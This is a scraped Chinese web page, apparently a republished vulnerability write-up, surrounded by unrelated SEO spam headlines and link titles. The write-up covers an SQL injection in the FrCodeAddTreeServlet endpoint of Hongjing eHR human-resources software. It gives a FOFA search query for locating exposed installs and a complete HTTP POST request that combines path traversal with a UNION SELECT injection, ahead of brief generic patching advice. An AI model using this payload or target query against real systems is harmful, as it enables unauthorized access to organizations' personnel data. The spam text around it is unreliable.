当前位置: 首页 > news >正文

用qq号码可以做网站吗网页制作公司业务部门负责人工作

用qq号码可以做网站吗,网页制作公司业务部门负责人工作,景安网站上传完还要怎么做,网站风险解除前言 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产…

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

宏景eHR是一款面向国有企事业单位的人力资源管理数智化软件产品,旨在帮助企业实现人力资源的数字化和智能化管理。

二、漏洞描述

该系统FrCodeAddTreeServlet接口存在SQL注入漏洞

三、影响范围

未知

四、复现环境

FOFA:app=“HJSOFT-HCM”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.测试payload

POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: IP:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Length: 132
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencodedparams=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1'+UNION+ALL+SELECT+123,NULL,NULL,NULL,NULL,NULL--+

3.成功
在这里插入图片描述

在这里插入图片描述

六、修复建议

及时更新系统,安装防护设备,过滤请求中的敏感字符

http://www.yayakq.cn/news/678069/

相关文章:

  • 椒江做阿里巴巴网站的公司中国前100强企业
  • 网站建设服务器租用多少钱移动网站建设哪家快
  • 专业制作网站公司吗东莞免费模版网站建设
  • 电商网站建设课程设计实验报告网站流量指标
  • 自己电脑做网站需要什么设备广州计算机培训班
  • 中国建设官方网站企业2.0网站线上建设什么意思
  • 一些js特效的网站推荐网站进度条
  • dedecms 百度网站地图购买域名后怎么做网站
  • 多人视频网站开发公司什么是功能型网站
  • 寿光专业做网站的公司有哪些做电力产品的外贸网站
  • 做营销网站哪家好微信公众号登录入口官方
  • 北京网站制作网站个人开发什么软件挣钱
  • 湘西州住房和城乡建设局网站数字营销师证书
  • 成品软件网站推荐常州发布信息的有什么网站
  • 建设网站有什么作用是什么微信网站建设报价表
  • 自己怎么建设网站广州建设职业学校广州校区
  • 红色扁平化网站什么语言做网站
  • 网站建设德尔普网站建设哪个公司做得好些
  • 重庆建站模板厂家网站运营和网络营销
  • 网站推广的基本方法为深圳网课
  • 怎么做交易猫钓鱼网站wordpress简约企业主题下载
  • 网站开发工程师大学开放平台设计方案
  • 做网站怎么穿插元素网络营销方式案例及分析
  • 肃宁县做网站价格win2008r2搭建php网站
  • 模板王网站怎么下载不了模板交换友情链接的方法
  • 网站的信任度flash网站源文件下载
  • 网站怎么做移动的图片厦门网站建设阳哥
  • 深圳汇鑫科技网站建设读书郎营销网站
  • 网站的方案世界建设企业网站
  • 北京微网站建设设计服务公司淮南政务